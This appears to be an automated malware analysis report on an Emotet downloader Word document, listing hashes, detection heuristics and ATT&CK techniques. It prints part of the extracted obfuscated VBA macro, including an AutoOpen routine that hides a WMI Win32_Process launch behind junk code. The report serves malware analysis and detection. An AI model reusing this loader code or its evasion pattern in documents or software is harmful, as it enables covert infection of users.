Emotet Office (OLE) malware analysis — malicious · fc4a5dcf28bc2330

MALICIOUS

Office (OLE)

139.9 KB Created: 2019-05-21 07:46:00 Authoring application: Microsoft Office Word First seen: 2019-12-10

MD5: 0cf1229d338902a6324f42023ef05536 SHA-1: 34dc164db29683febca32edb524da9b158f64a36 SHA-256: fc4a5dcf28bc233088a95d558803973665cf2bc127510d294bc10e52d07138c5

342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical heuristic firing for an obfuscated auto-exec VBA loader that uses WMI to launch processes. The presence of an AutoOpen macro and the ClamAV detection signature 'Doc.Downloader.Emotet-10001946-0' strongly indicate this is an Emotet downloader. The VBA script's intent is to execute a secondary payload, likely via the WMI Win32_Process launcher.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5808 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5808 bytes
SHA-256: `0c89221e537bf357fcba350de690c01166c38552d4601e2b045def3c757e435f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "D2722316" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "o59071, 0, 0, MSForms, TextBox" Attribute VB_Control = "z4641307, 1, 1, MSForms, TextBox" Attribute VB_Name = "Y12454" Sub T58828() Dim F80871() ReDim F80871(53266) F80871(53148) = 955 + Int(U946439) + B2152371 + Int(656) + z1174585 + Y43_07_ + 128 + z59643 F80871(53136) = 103 + Int(l95388) + k2_64347 + Int(769) + Q780561 + b31432 + 615 + E74504 F80871(53220) = 961 + Int(f35_768) + E_198123 + Int(438) + R376682 + n5_10550 + 557 + i156014 F80871(53121) = 958 + Int(i00845) + X0474_81 + Int(994) + i38961 + B7642072 + 531 + c19_29 Dim J9992_8() ReDim J9992_8(53266) J9992_8(53148) = 559 + Int(E3_88_) + X88623 + Int(582) + U868863 + R_908959 + 136 + c792917 J9992_8(53136) = 776 + Int(X12190) + T88__74 + Int(338) + w15189 + v4_80625 + 900 + o009392 J9992_8(53220) = 893 + Int(K955707) + U44__47 + Int(700) + s68580 + O246_3 + 189 + b348766 J9992_8(53121) = 528 + Int(v_67148) + b49769 + Int(302) + r51938 + c74_2_4 + 346 + o73336 End Sub Sub _ autoopen( _ ) Dim S55338() ReDim S55338(87025) S55338(86925) = 197 + Int(r0557287) + o05854 + Int(864) + S172_4 + c332_6_ + 179 + P2747328 S55338(86900) = 61 + Int(f895089) + X259354_ + Int(832) + b057_81 + A4369_6 + 489 + p2_052 S55338(86890) = 714 + Int(J_3983) + N3638408 + Int(140) + A3092974 + B5390359 + 502 + h23430 S55338(86859) = 113 + Int(J34900) + F12_69 + Int(232) + T915_8 + T1760066 + 528 + G5___486 B99_74 Dim a_168059() ReDim a_168059(87025) a_168059(86925) = 305 + Int(I4702167) + X17421 + Int(605) + c9264651 + T9029141 + 182 + j246829 a_168059(86900) = 158 + Int(F273_1) + Q91093 + Int(183) + q3015750 + A8580883 + 692 + p1600_49 a_168059(86890) = 361 + Int(F3__22) + H44496_ + Int(79) + G_6301 + J78123 + 658 + F806673 a_168059(86859) = 174 + Int(m84_028) + r05_90 + Int(974) + D3172_05 + h441375 + 633 + n_51509 End Sub Sub B99_74() Dim V43261() ReDim V43261(87025) V43261(86925) = 286 + Int(U_3194_) + w9826_ + Int(576) + L128_9_ + d_37556 + 729 + z_049476 V43261(86900) = 429 + Int(j9211949) + A4955_5 + Int(304) + m100658 + T3728_2 + 76 + i2__3_7 V43261(86890) = 82 + Int(T232737) + i82_58 + Int(175) + F630__ + o270048 + 974 + B56544 V43261(86859) = 746 + Int(Z373165_) + b34525 + Int(472) + l45_652 + j2021333 + 219 + V64395_ Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup")) Dim L7913123() ReDim L7913123(87025) L7913123(86925) = 275 + Int(S_115665) + X74410 + Int(100) + D6_491 + E9__7606 + 125 + f15568 L7913123(86900) = 1 + Int(R988823) + k419957 + Int(631) + H69_0112 + a79736 + 280 + Q63515 L7913123(86890) = 676 + Int(Q_00623_) + o78_7402 + Int(536) + N254040 + b3129848 + 35 + L_55886 L7913123(86859) = 675 + Int(O27310) + j94_947 + Int(602) + v132_1 + m17203 + 897 + D50900 j9118_6. _ ShowWindow = 422843 - 422843 Dim a_213263() ReDim a_213263(87025) a_213263(86925) = 921 + Int(z407_800) + f06534 + Int(526) + L817474 + n041_480 + 646 + p188932 a_213263(86900) = 497 + Int(w443_3) + c_732269 + Int(542) + o48210 + T0260269 + 562 + w1822506 a_213263(86890) = 909 + Int(z83360) + R59370 + Int(451) + H74_09_2 + i92445 + 263 + L787657 a_213263(86859) = 400 + Int(F48_2543) + z41598 + Int(430) + V04_13 + w074485 + 971 + r1__3205 Set K85731 = GetObject(v752570("winmgmts:Win32" + "_Process")) Dim V0972258() ReDim V0972258(87025) V0972258(86925) = 971 + Int(O25473_) + j33_07 + Int(826) + X55_29 + D920521 + 276 + W2725_04 V0972258(86900) = 397 + Int(J356767) + B77_33 + Int(127) + F28395 + O162951 + 976 + m597644 V0972258(86890) = 815 + Int(j_29614) + z614_3 + Int(544) ... (truncated)

SHA-256: 0c89221e537bf357fcba350de690c01166c38552d4601e2b045def3c757e435f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "D2722316"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "o59071, 0, 0, MSForms, TextBox"
Attribute VB_Control = "z4641307, 1, 1, MSForms, TextBox"

Attribute VB_Name = "Y12454"
Sub T58828()
   Dim F80871()
      ReDim F80871(53266)
      F80871(53148) = 955 + Int(U946439) + B2152371 + Int(656) + z1174585 + Y43_07_ + 128 + z59643
      F80871(53136) = 103 + Int(l95388) + k2_64347 + Int(769) + Q780561 + b31432 + 615 + E74504
      F80871(53220) = 961 + Int(f35_768) + E_198123 + Int(438) + R376682 + n5_10550 + 557 + i156014
      F80871(53121) = 958 + Int(i00845) + X0474_81 + Int(994) + i38961 + B7642072 + 531 + c19_29
   Dim J9992_8()
      ReDim J9992_8(53266)
      J9992_8(53148) = 559 + Int(E3_88_) + X88623 + Int(582) + U868863 + R_908959 + 136 + c792917
      J9992_8(53136) = 776 + Int(X12190) + T88__74 + Int(338) + w15189 + v4_80625 + 900 + o009392
      J9992_8(53220) = 893 + Int(K955707) + U44__47 + Int(700) + s68580 + O246_3 + 189 + b348766
      J9992_8(53121) = 528 + Int(v_67148) + b49769 + Int(302) + r51938 + c74_2_4 + 346 + o73336
End Sub
Sub _
autoopen( _
)
   Dim S55338()
      ReDim S55338(87025)
      S55338(86925) = 197 + Int(r0557287) + o05854 + Int(864) + S172_4 + c332_6_ + 179 + P2747328
      S55338(86900) = 61 + Int(f895089) + X259354_ + Int(832) + b057_81 + A4369_6 + 489 + p2_052
      S55338(86890) = 714 + Int(J_3983) + N3638408 + Int(140) + A3092974 + B5390359 + 502 + h23430
      S55338(86859) = 113 + Int(J34900) + F12_69 + Int(232) + T915_8 + T1760066 + 528 + G5___486
B99_74
   Dim a_168059()
      ReDim a_168059(87025)
      a_168059(86925) = 305 + Int(I4702167) + X17421 + Int(605) + c9264651 + T9029141 + 182 + j246829
      a_168059(86900) = 158 + Int(F273_1) + Q91093 + Int(183) + q3015750 + A8580883 + 692 + p1600_49
      a_168059(86890) = 361 + Int(F3__22) + H44496_ + Int(79) + G_6301 + J78123 + 658 + F806673
      a_168059(86859) = 174 + Int(m84_028) + r05_90 + Int(974) + D3172_05 + h441375 + 633 + n_51509
End Sub
Sub B99_74()
   Dim V43261()
      ReDim V43261(87025)
      V43261(86925) = 286 + Int(U_3194_) + w9826_ + Int(576) + L128_9_ + d_37556 + 729 + z_049476
      V43261(86900) = 429 + Int(j9211949) + A4955_5 + Int(304) + m100658 + T3728_2 + 76 + i2__3_7
      V43261(86890) = 82 + Int(T232737) + i82_58 + Int(175) + F630__ + o270048 + 974 + B56544
      V43261(86859) = 746 + Int(Z373165_) + b34525 + Int(472) + l45_652 + j2021333 + 219 + V64395_
Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
   Dim L7913123()
      ReDim L7913123(87025)
      L7913123(86925) = 275 + Int(S_115665) + X74410 + Int(100) + D6_491 + E9__7606 + 125 + f15568
      L7913123(86900) = 1 + Int(R988823) + k419957 + Int(631) + H69_0112 + a79736 + 280 + Q63515
      L7913123(86890) = 676 + Int(Q_00623_) + o78_7402 + Int(536) + N254040 + b3129848 + 35 + L_55886
      L7913123(86859) = 675 + Int(O27310) + j94_947 + Int(602) + v132_1 + m17203 + 897 + D50900
j9118_6. _
ShowWindow = 422843 - 422843
   Dim a_213263()
      ReDim a_213263(87025)
      a_213263(86925) = 921 + Int(z407_800) + f06534 + Int(526) + L817474 + n041_480 + 646 + p188932
      a_213263(86900) = 497 + Int(w443_3) + c_732269 + Int(542) + o48210 + T0260269 + 562 + w1822506
      a_213263(86890) = 909 + Int(z83360) + R59370 + Int(451) + H74_09_2 + i92445 + 263 + L787657
      a_213263(86859) = 400 + Int(F48_2543) + z41598 + Int(430) + V04_13 + w074485 + 971 + r1__3205
Set K85731 = GetObject(v752570("winmgmts:Win32" + "_Process"))
   Dim V0972258()
      ReDim V0972258(87025)
      V0972258(86925) = 971 + Int(O25473_) + j33_07 + Int(826) + X55_29 + D920521 + 276 + W2725_04
      V0972258(86900) = 397 + Int(J356767) + B77_33 + Int(127) + F28395 + O162951 + 976 + m597644
      V0972258(86890) = 815 + Int(j_29614) + z614_3 + Int(544)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.